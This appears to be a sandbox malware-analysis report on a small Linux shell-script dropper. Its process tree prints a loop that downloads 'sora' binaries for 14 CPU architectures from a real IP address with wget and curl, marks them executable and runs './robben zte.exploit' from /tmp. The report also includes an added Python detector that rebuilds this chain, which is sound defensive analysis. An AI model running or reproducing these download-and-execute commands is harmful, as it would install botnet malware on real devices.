Analysis
max time kernel: 11s
max time network: 12s
platform: debian-9_armhf
resource: debian9-armhf-20240418-en
resource tags: arch:armhf, image:debian9-armhf-20240418-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 18/10/2024, 03:05
Static task
static1
Behavioral tasks (all on sample f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh)
behavioral1: ubuntu1804-amd64-20240611-en
behavioral2: debian9-armhf-20240418-en
behavioral3: debian9-mipsbe-20240418-en
behavioral4: debian9-mipsel-20240611-en
General
Target: f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Size: 2KB
MD5: 5ee0ae1a52cdb3d257932d6b048f6846
SHA1: 074cd5bc461923829a352d3d3b74ca92b72e030a
SHA256: f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70
SHA512: 7f917bcdf1f7be589cd8fdd2455740907a4d4941f63b4f4eb548a7ff83a4a1a553aeb5f572a6bbfdd02096c32dc9223b8985f1754494d42ef5e1a16a4a9dd25a
Malware Config
Signatures
File and Directory Permissions Modification (1 TTP, 14 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
PID   Process
660   chmod
675   chmod
683   chmod
689   chmod
698   chmod
710   chmod
722   chmod
733   chmod
745   chmod
770   chmod
776   chmod
788   chmod
800   chmod
814   chmod

Executes dropped EXE (14 IoCs)
IoC          PID   Process
/tmp/robben  663   robben
/tmp/robben  676   robben
/tmp/robben  684   robben
/tmp/robben  690   robben
/tmp/robben  699   robben
/tmp/robben  711   robben
/tmp/robben  724   robben
/tmp/robben  735   robben
/tmp/robben  747   robben
/tmp/robben  771   robben
/tmp/robben  777   robben
/tmp/robben  790   robben
/tmp/robben  801   robben
/tmp/robben  815   robben

Checks CPU configuration (1 TTP, 14 IoCs)
Checks CPU information which indicates whether the system is a virtual machine.
Description               IoC            Process   Occurrences
File opened for reading   /proc/cpuinfo  curl      14 (one per curl invocation in the process tree)

Reads runtime system information (28 IoCs)
Description               IoC                             Process   Occurrences
File opened for reading   /proc/sys/crypto/fips_enabled   curl      14
File opened for reading   /proc/self/auxv                 curl      14

Note on the two signatures above: every one of these /proc reads is attributed to curl, a stock system tool, not to the 2KB shell script under analysis. Reads of /proc/cpuinfo, /proc/self/auxv and /proc/sys/crypto/fips_enabled at process start are characteristic of library initialization (hardware-capability probing and the FIPS-mode check done by the crypto library curl links against), so they should not be read as the sample deliberately fingerprinting the sandbox. The sample itself shows no evasion logic in this report.

System Network Configuration Discovery (1 TTP, 3 IoCs)
Adversaries may gather information about the network configuration of a system.
PID   Process
665   wget
669   curl
673   cat

Writes file to tmp directory (1 IoC)
Malware often drops required files in the /tmp directory.
Description                    IoC          Process
File opened for modification   /tmp/robben  f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Processes
/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh (PID 637): /tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
  - Writes file to tmp directory

  /usr/bin/wget (PID 639): wget http://93.123.85.141/bins/sora.x86
  /usr/bin/curl (PID 649): curl -O http://93.123.85.141/bins/sora.x86
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 658): cat sora.x86
  /bin/chmod (PID 660): chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
    - File and Directory Permissions Modification
  /tmp/robben (PID 663): ./robben zte.exploit
    - Executes dropped EXE

  /usr/bin/wget (PID 665): wget http://93.123.85.141/bins/sora.mips
    - System Network Configuration Discovery
  /usr/bin/curl (PID 669): curl -O http://93.123.85.141/bins/sora.mips
    - Checks CPU configuration
    - Reads runtime system information
    - System Network Configuration Discovery
  /bin/cat (PID 673): cat sora.mips
    - System Network Configuration Discovery
  /bin/chmod (PID 675): chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
    - File and Directory Permissions Modification
  /tmp/robben (PID 676): ./robben zte.exploit
    - Executes dropped EXE

  /usr/bin/wget (PID 679): wget http://93.123.85.141/bins/sora.x86_64
  /usr/bin/curl (PID 681): curl -O http://93.123.85.141/bins/sora.x86_64
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 682): cat sora.x86_64
  /bin/chmod (PID 683): chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
    - File and Directory Permissions Modification
  /tmp/robben (PID 684): ./robben zte.exploit
    - Executes dropped EXE

  /usr/bin/wget (PID 686): wget http://93.123.85.141/bins/sora.i468
  /usr/bin/curl (PID 687): curl -O http://93.123.85.141/bins/sora.i468
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 688): cat sora.i468
  /bin/chmod (PID 689): chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
    - File and Directory Permissions Modification
  /tmp/robben (PID 690): ./robben zte.exploit
    - Executes dropped EXE

  /usr/bin/wget (PID 692): wget http://93.123.85.141/bins/sora.i686
  /usr/bin/curl (PID 693): curl -O http://93.123.85.141/bins/sora.i686
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 696): cat sora.i686
  /bin/chmod (PID 698): chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
    - File and Directory Permissions Modification
  /tmp/robben (PID 699): ./robben zte.exploit
    - Executes dropped EXE

  /usr/bin/wget (PID 702): wget http://93.123.85.141/bins/sora.mpsl
  /usr/bin/curl (PID 705): curl -O http://93.123.85.141/bins/sora.mpsl
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 708): cat sora.mpsl
  /bin/chmod (PID 710): chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
    - File and Directory Permissions Modification
  /tmp/robben (PID 711): ./robben zte.exploit
    - Executes dropped EXE

  /usr/bin/wget (PID 714): wget http://93.123.85.141/bins/sora.arm4
  /usr/bin/curl (PID 717): curl -O http://93.123.85.141/bins/sora.arm4
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 720): cat sora.arm4
  /bin/chmod (PID 722): chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
    - File and Directory Permissions Modification
  /tmp/robben (PID 724): ./robben zte.exploit
    - Executes dropped EXE

  /usr/bin/wget (PID 726): wget http://93.123.85.141/bins/sora.arm5
  /usr/bin/curl (PID 729): curl -O http://93.123.85.141/bins/sora.arm5
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 732): cat sora.arm5
  /bin/chmod (PID 733): chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
    - File and Directory Permissions Modification
  /tmp/robben (PID 735): ./robben zte.exploit
    - Executes dropped EXE

  /usr/bin/wget (PID 737): wget http://93.123.85.141/bins/sora.arm6
  /usr/bin/curl (PID 740): curl -O http://93.123.85.141/bins/sora.arm6
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 744): cat sora.arm6
  /bin/chmod (PID 745): chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
    - File and Directory Permissions Modification
  /tmp/robben (PID 747): ./robben zte.exploit
    - Executes dropped EXE

  /usr/bin/wget (PID 749): wget http://93.123.85.141/bins/sora.arm7
  /usr/bin/curl (PID 754): curl -O http://93.123.85.141/bins/sora.arm7
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 769): cat sora.arm7
  /bin/chmod (PID 770): chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
    - File and Directory Permissions Modification
  /tmp/robben (PID 771): ./robben zte.exploit
    - Executes dropped EXE

  /usr/bin/wget (PID 773): wget http://93.123.85.141/bins/sora.ppc
  /usr/bin/curl (PID 774): curl -O http://93.123.85.141/bins/sora.ppc
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 775): cat sora.ppc
  /bin/chmod (PID 776): chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
    - File and Directory Permissions Modification
  /tmp/robben (PID 777): ./robben zte.exploit
    - Executes dropped EXE

  /usr/bin/wget (PID 780): wget http://93.123.85.141/bins/sora.ppc440fp
  /usr/bin/curl (PID 783): curl -O http://93.123.85.141/bins/sora.ppc440fp
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 787): cat sora.ppc440fp
  /bin/chmod (PID 788): chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
    - File and Directory Permissions Modification
  /tmp/robben (PID 790): ./robben zte.exploit
    - Executes dropped EXE

  /usr/bin/wget (PID 792): wget http://93.123.85.141/bins/sora.m68k
  /usr/bin/curl (PID 795): curl -O http://93.123.85.141/bins/sora.m68k
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 799): cat sora.m68k
  /bin/chmod (PID 800): chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
    - File and Directory Permissions Modification
  /tmp/robben (PID 801): ./robben zte.exploit
    - Executes dropped EXE

  /usr/bin/wget (PID 804): wget http://93.123.85.141/bins/sora.sh4
  /usr/bin/curl (PID 808): curl -O http://93.123.85.141/bins/sora.sh4
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat (PID 812): cat sora.sh4
  /bin/chmod (PID 814): chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
    - File and Directory Permissions Modification
  /tmp/robben (PID 815): ./robben zte.exploit
    - Executes dropped EXE

Analyst notes on the tree: the sample is a 2KB shell script that runs the same five-step block 14 times, once per payload suffix (x86, mips, x86_64, i468, i686, mpsl, arm4, arm5, arm6, arm7, ppc, ppc440fp, m68k, sh4). Each block fetches http://93.123.85.141/bins/sora.<arch> with wget and again with curl -O, reads the downloaded file with cat, marks files executable, and runs ./robben zte.exploit. The sandbox records argv only, so shell redirections are not visible: the cat step's output target does not appear in the tree, and the chmod argument list (the script itself, robben, and a systemd PrivateTmp directory name) is what a `chmod +x *` glob expands to inside /tmp. An exec of /tmp/robben is attempted in every iteration, regardless of whether the fetch succeeded or the fetched binary matches the sandbox CPU (armhf in this run), and the Network section of this report is empty, so no follow-on traffic from the payload is recorded within the 12s network window.
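The loop above can be recovered mechanically from the process tree. The following Python is an added example for this page, not the sandbox vendor's code and not the sample: it parses a constructed subset of the tree (three of the 14 iterations, using the PIDs and argv shown above), extracts the download host, URLs and architecture suffixes, and reports each fetch -> chmod +x -> execute-from-/tmp chain. The input line format (pid, image, argv) is an assumption made for the example; against a real sandbox you would parse its JSON export instead.

```python
"""Reconstruct a per-architecture drop-and-execute loop from a sandbox
process tree. Added example for this report; not code from the sandbox
vendor or from the sample. The 'pid image argv...' line format is an
assumption for the example, constructed from the report's process tree."""
import os
import re
from urllib.parse import urlparse

DOWNLOADERS = {"wget", "curl"}
URL_RE = re.compile(r"https?://[^\s'\"]+")

# Constructed subset of the report's process tree (x86, mips and arm7
# iterations; the real run has 14 such blocks).
PROCESS_LOG = """\
637 /tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh /tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
639 /usr/bin/wget wget http://93.123.85.141/bins/sora.x86
649 /usr/bin/curl curl -O http://93.123.85.141/bins/sora.x86
658 /bin/cat cat sora.x86
660 /bin/chmod chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
663 /tmp/robben ./robben zte.exploit
665 /usr/bin/wget wget http://93.123.85.141/bins/sora.mips
669 /usr/bin/curl curl -O http://93.123.85.141/bins/sora.mips
673 /bin/cat cat sora.mips
675 /bin/chmod chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
676 /tmp/robben ./robben zte.exploit
749 /usr/bin/wget wget http://93.123.85.141/bins/sora.arm7
754 /usr/bin/curl curl -O http://93.123.85.141/bins/sora.arm7
769 /bin/cat cat sora.arm7
770 /bin/chmod chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
771 /tmp/robben ./robben zte.exploit
"""


def parse_log(text):
    """Turn 'pid image argv...' lines into dicts, preserving execution order."""
    procs = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, image, *argv = line.split()
        procs.append({"pid": int(pid), "image": image, "argv": argv})
    return procs


def extract_iocs(procs):
    """Collect download URLs, hosts, payload architecture suffixes and
    binaries executed from /tmp (excluding the submitted sample itself)."""
    urls, hosts, archs = set(), set(), []
    for p in procs:
        for arg in p["argv"]:
            if URL_RE.fullmatch(arg):
                urls.add(arg)
                hosts.add(urlparse(arg).hostname)
                # Payloads are named <family>.<arch>; keep first-seen order.
                arch = os.path.basename(urlparse(arg).path).rsplit(".", 1)[-1]
                if arch not in archs:
                    archs.append(arch)
    dropped = {p["image"] for p in procs[1:] if p["image"].startswith("/tmp/")}
    return {"urls": sorted(urls), "hosts": sorted(hosts),
            "archs": archs, "dropped": sorted(dropped)}


def find_drop_exec_chains(procs):
    """Return (url, staged_name, exec_pid) for every fetch -> chmod +x ->
    execute-from-/tmp sequence. The fetch need not have succeeded: the
    loop in this report runs the chain unconditionally per architecture."""
    chains, last_url, chmod_targets = [], None, set()
    for p in procs:
        name = p["argv"][0] if p["argv"] else ""
        if name in DOWNLOADERS:
            found = [a for a in p["argv"] if URL_RE.fullmatch(a)]
            if found:
                last_url = found[0]
        elif name == "chmod" and "+x" in p["argv"]:
            chmod_targets = set(p["argv"][p["argv"].index("+x") + 1:])
        elif (p["image"].startswith("/tmp/")
              and os.path.basename(p["image"]) in chmod_targets
              and last_url is not None):
            chains.append((last_url, os.path.basename(p["image"]), p["pid"]))
            last_url = None  # one exec per fetch; the next iteration starts fresh
    return chains


def verdict(procs):
    """A staged-downloader verdict requires at least one complete chain."""
    chains = find_drop_exec_chains(procs)
    iocs = extract_iocs(procs)
    return {"staged_downloader": bool(chains),
            "iterations": len(chains),
            "download_hosts": iocs["hosts"],
            "archs": iocs["archs"],
            "dropped": iocs["dropped"]}


if __name__ == "__main__":
    for key, value in verdict(parse_log(PROCESS_LOG)).items():
        print(f"{key}: {value}")
```

The chain detector deliberately keys on the chmod argument list rather than on the download succeeding, because in this report the exec of /tmp/robben happens in every iteration whether or not a matching binary was fetched; a detector that waited for a successful download would miss the loop entirely on a host whose architecture the server never serves.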
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
  File and Directory Permissions Modification (1)
    Linux and Mac File and Directory Permissions Modification (1)
  Virtualization/Sandbox Evasion (1)
    System Checks (1)